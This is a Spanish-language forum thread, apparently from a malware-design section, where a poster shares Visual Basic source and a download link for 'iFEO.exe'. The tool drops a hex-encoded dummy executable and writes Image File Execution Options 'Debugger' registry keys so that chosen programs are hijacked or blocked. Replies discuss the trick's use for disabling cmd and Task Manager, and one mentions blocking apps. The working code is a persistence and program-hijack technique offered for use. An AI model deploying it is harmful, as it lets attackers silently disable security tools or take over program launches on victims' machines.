Aquí dejo el source completo del programa iFEO.exe del que he hablado en este post original:
[Método] - iFEO bug (Image File Execution Options) (http://foro.elhacker.net/analisis_y_diseno_de_malware/metodo_ifeo_bug_image_file_execution_options-t249670.0.html#msg1203340)
Aquí esta el source del programa, el módulo principal:
Function DropDummy(ByVal ThePath As String) As Boolean
On Error Resume Next
File = ""
File = File & "4D5A0000504500004C0101006A2A58C3z8z040003010B01080001"
File = File & "000080z4z79z3z0Cz3z79z3z0Cz5z400004z3z04z3z74z3z20z3z"
File = File & "04z7z0401000088z7z02z19z4B45524E454C33322E646C6Cz4z38"
i = 1
Tmp = ""
While i <= Len(File)
If Mid(File, i, 1) = "z" Then
a = i + 1
k = 0
While Mid(File, a, 1) <> "z"
k = k * 10 + Mid(File, a, 1)
a = a + 1
Wend
i = a + 1
For a = 1 To k
Tmp = Tmp + "00"
Next
ElseIf Mid(File, i, 1) <> "z" Then
Tmp = Tmp & Mid(File, i, 2)
i = i + 2
End If
Wend
Set hFSO = CreateObject("Scripting.FileSystemObject")
Set hFile = hFSO.CreateTextFile(ThePath, ForWriting)
i = 1
While i < Len(Tmp)
File = Int("&H" & Mid(Tmp, i, 2))
hFile.Write (Chr(File))
i = i + 2
Wend
hFile.Close
DoEvents
DropDummy = True
End Function
Function AddFileName(ByVal fName As String, ByVal DummyFile As String)
On Error Resume Next
Set WShell = CreateObject("WScript.Shell")
WShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" & fName & "\Debugger", Chr(34) & UCase(DummyFile) & Chr(34)
End Function
Function DelFileName(ByVal fName As String)
On Error Resume Next
Set WShell = CreateObject("WScript.Shell")
WShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" & fName & "\Debugger"
End Function
Y su descarga completa:
http://cactus-software.elhacker.net/iFEO Bug.zip (http://cactus-software.elhacker.net/iFEO%20Bug.zip)
Saludos!!
Hola, muy interesante por lo que lei en el post original la verdad yo tambien desconosia esto, lo prove y funciona muy bien, ¿que se supone que esta haciendo el codigo para que llame al dumpy.exe lo marca como el Debugger iexplorer?
Saludos.
Buen aporte Mad y gracias, pero...
como dicen los conocedores del foro, ya se viene manejando esa herramienta desde tiempo atrás, y tienes razón, muchos lo conocen pero tantos más lo desconocen.
Mi opinion es que las herramientas son creadas para una finalidad, pero realmente terminan siendo un abanico de posibilidades, ejmplo:
Este code con un poco de imaginacion, se puede implementar para seguridad más que para joder gente, y de pronto me viene a la mente, bloquear aplicaciones como el msn, y agregarle un modulito que hice para que se ejecute como usuario System ;D
es bastante viejo, este metodo tambien se usa para deshabilitar el cmd, task, etc. :rolleyes:
Tal vez el método sea viejo, pero yo por lo menos no lo conocía, gracias por el aporte.
PD: El viento tambien es viejo y cada vez sopla mas.
Saludos
Cierto, lo que pasa es como lo dijeron "Era un secreto que iba de boca en boca" :xD